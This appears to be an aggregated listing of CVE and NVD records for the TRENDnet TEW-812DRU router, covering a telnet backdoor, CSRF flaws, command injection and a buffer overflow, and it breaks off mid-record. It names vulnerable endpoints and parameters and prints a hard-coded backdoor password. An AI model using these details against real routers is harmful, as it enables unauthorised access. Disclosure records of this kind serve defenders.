Vulnerabilites related to trendnet - tew-812dru
cve-2013-3366
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ise.io/casestudies/exploiting-soho-routers/ | x_refsource_MISC | |
https://www.ise.io/soho_service_hacks/ | x_refsource_MISC | |
https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:07:37.505Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-07-16T00:00:00", "descriptions": [ { "lang": "en", "value": "Undocumented TELNET service in TRENDnet TEW-812DRU when a web page named backdoor contains an HTML parameter of password and a value of j78G\u00acDFdg_24Mhw3." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-11-13T21:01:35", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-3366", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Undocumented TELNET service in TRENDnet TEW-812DRU when a web page named backdoor contains an HTML parameter of password and a value of j78G\u00acDFdg_24Mhw3." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ise.io/casestudies/exploiting-soho-routers/", "refsource": "MISC", "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "name": "https://www.ise.io/soho_service_hacks/", "refsource": "MISC", "url": "https://www.ise.io/soho_service_hacks/" }, { "name": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf", "refsource": "MISC", "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-3366", "datePublished": "2019-11-13T21:01:35", "dateReserved": "2013-05-06T00:00:00", "dateUpdated": "2024-08-06T16:07:37.505Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-3098
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://osvdb.org/95803 | vdb-entry, x_refsource_OSVDB | |
http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf | x_refsource_MISC | |
http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php | x_refsource_MISC | |
http://secunia.com/advisories/54310 | third-party-advisory, x_refsource_SECUNIA | |
http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:00:09.778Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "95803", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/95803" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php" }, { "name": "54310", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/54310" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-07-28T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2014-02-04T15:57:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "95803", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/95803" }, { "tags": [ "x_refsource_MISC" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "tags": [ "x_refsource_MISC" ], "url": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php" }, { "name": "54310", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/54310" }, { "tags": [ "x_refsource_MISC" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-3098", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "95803", "refsource": "OSVDB", "url": "http://osvdb.org/95803" }, { "name": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf", "refsource": "MISC", "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "name": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php", "refsource": "MISC", "url": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php" }, { "name": "54310", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/54310" }, { "name": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html", "refsource": "MISC", "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-3098", "datePublished": "2014-02-04T16:00:00", "dateReserved": "2013-04-17T00:00:00", "dateUpdated": "2024-08-06T16:00:09.778Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-3365
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf | x_refsource_MISC | |
http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:07:37.856Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-07-28T00:00:00", "descriptions": [ { "lang": "en", "value": "TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2014-02-04T15:57:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "tags": [ "x_refsource_MISC" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-3365", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf", "refsource": "MISC", "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "name": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html", "refsource": "MISC", "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-3365", "datePublished": "2014-02-04T16:00:00", "dateReserved": "2013-05-06T00:00:00", "dateUpdated": "2024-08-06T16:07:37.856Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-4659
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html | x_refsource_MISC | |
http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:52:26.903Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-03-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-03-14T08:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-4659", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html", "refsource": "MISC", "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "name": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers", "refsource": "MISC", "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-4659", "datePublished": "2017-03-14T09:02:00", "dateReserved": "2013-06-24T00:00:00", "dateUpdated": "2024-08-06T16:52:26.903Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
trendnet | tew-812dru_firmware | 1.0.8.0 | |
trendnet | tew-812dru | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:trendnet:tew-812dru_firmware:1.0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "6851A404-2FEF-4142-B522-22E217378B72", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:trendnet:tew-812dru:-:*:*:*:*:*:*:*", "matchCriteriaId": "28DC340B-27D7-4F13-A544-E8256159C2D6", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information." }, { "lang": "es", "value": "M\u00faltiples vulnerabilidades de CSRF en el router TRENDnet TEW-812DRU con firmware anterior a 1.0.9.0 permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores para solicitudes que (1) cambian las credenciales de admin en una solicitud hacia setSysAdm.cgi, (2) habilitan la gesti\u00f3n remota o (3) habilitan el reenv\u00edo de puertos en una acci\u00f3n Apply hacia uapply.cgi, o (4) tienen un impacto no especificado a trav\u00e9s de una solicitud hacia setNTP.cgi. NOTA: algunos de estos detalles se obtienen de informaci\u00f3n de terceras partes." } ], "id": "CVE-2013-3098", "lastModified": "2024-11-21T01:53:00.237", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ] }, "published": "2014-02-04T21:55:05.107", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" }, { "source": "cve@mitre.org", "url": "http://osvdb.org/95803" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://secunia.com/advisories/54310" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://osvdb.org/95803" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://secunia.com/advisories/54310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-352" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers | Press/Media Coverage | |
cve@mitre.org | https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html | Exploit, Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers | Press/Media Coverage | |
af854a3a-2127-422b-91ae-364da2661108 | https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html | Exploit, Third Party Advisory, VDB Entry |
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac66u_firmware | - | |
asus | rt-ac66u | - | |
trendnet | tew-812dru_firmware | - | |
trendnet | tew-812dru | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FFDE31E-5C68-4DC7-9B4A-C19F1719CA91", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:trendnet:tew-812dru_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "52A912D3-05B3-4A84-A0C9-743BC059A57E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:trendnet:tew-812dru:-:*:*:*:*:*:*:*", "matchCriteriaId": "28DC340B-27D7-4F13-A544-E8256159C2D6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU." }, { "lang": "es", "value": "Desbordamiento de b\u00fafer en Broadcom ACSD permite a atacantes remotos ejecutar c\u00f3digo arbitrario a trav\u00e9s de una cadena larga al puerto TCP 5916. Este componente es utilizado en routers de m\u00faltiples vendedores incluyendo ASUS RT-AC66U y TRENDnet TEW-812DRU." } ], "id": "CVE-2013-4659", "lastModified": "2024-11-21T01:56:00.523", "metrics": { "cvssMetricV2": [ { "acInsufInfo": true, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2017-03-14T09:59:00.160", "references": [ { "source": "cve@mitre.org", "tags": [ "Press/Media Coverage" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Press/Media Coverage" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-119" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://www.ise.io/casestudies/exploiting-soho-routers/ | Mitigation, Third Party Advisory | |
cve@mitre.org | https://www.ise.io/soho_service_hacks/ | Mitigation, Third Party Advisory | |
cve@mitre.org | https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf | Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.ise.io/casestudies/exploiting-soho-routers/ | Mitigation, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.ise.io/soho_service_hacks/ | Mitigation, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf | Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
trendnet | tew-812dru_firmware | - | |
trendnet | tew-812dru | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:trendnet:tew-812dru_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "52A912D3-05B3-4A84-A0C9-743BC059A57E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:trendnet:tew-812dru:-:*:*:*:*:*:*:*", "matchCriteriaId": "28DC340B-27D7-4F13-A544-E8256159C2D6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Undocumented TELNET service in TRENDnet TEW-812DRU when a web page named backdoor contains an HTML parameter of password and a value of j78G\u00acDFdg_24Mhw3." }, { "lang": "es", "value": "Servicio TELNET sin documentaic\u00f3n en TRENDnet TEW-812DRU cuando una p\u00e1gina web llamada puerta trasera contiene un par\u00e1metro HTML de contrase\u00f1a y un valor de j78G\u00acDFdg_24Mhw3." } ], "id": "CVE-2013-3366", "lastModified": "2024-11-21T01:53:29.160", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-11-13T22:15:11.303", "references": [ { "source": "cve@mitre.org", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "source": "cve@mitre.org", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-352" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
trendnet | tew-812dru | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:h:trendnet:tew-812dru:-:*:*:*:*:*:*:*", "matchCriteriaId": "28DC340B-27D7-4F13-A544-E8256159C2D6", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098." }, { "lang": "es", "value": "El router TRENDnet TEW-812DRU permite a usuarios remotos autenticados ejecutar comandos arbitrarios a trav\u00e9s de metacaracteres de shell en el (1) prefijo wan network hacia internet/ipv6.asp; (2) remote port hacia adm/management.asp; (3) pptp username, (4) pptp password, (5) IP, (6) gateway, (7) l2tp username, o (8) l2tp password hacia internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, o (11) NtpDstOffset hacia adm/time.asp; o (12) device url hacia adm/management.asp. NOTA: los vectores 9, 10 y 11 pueden ser explotados por atacantes 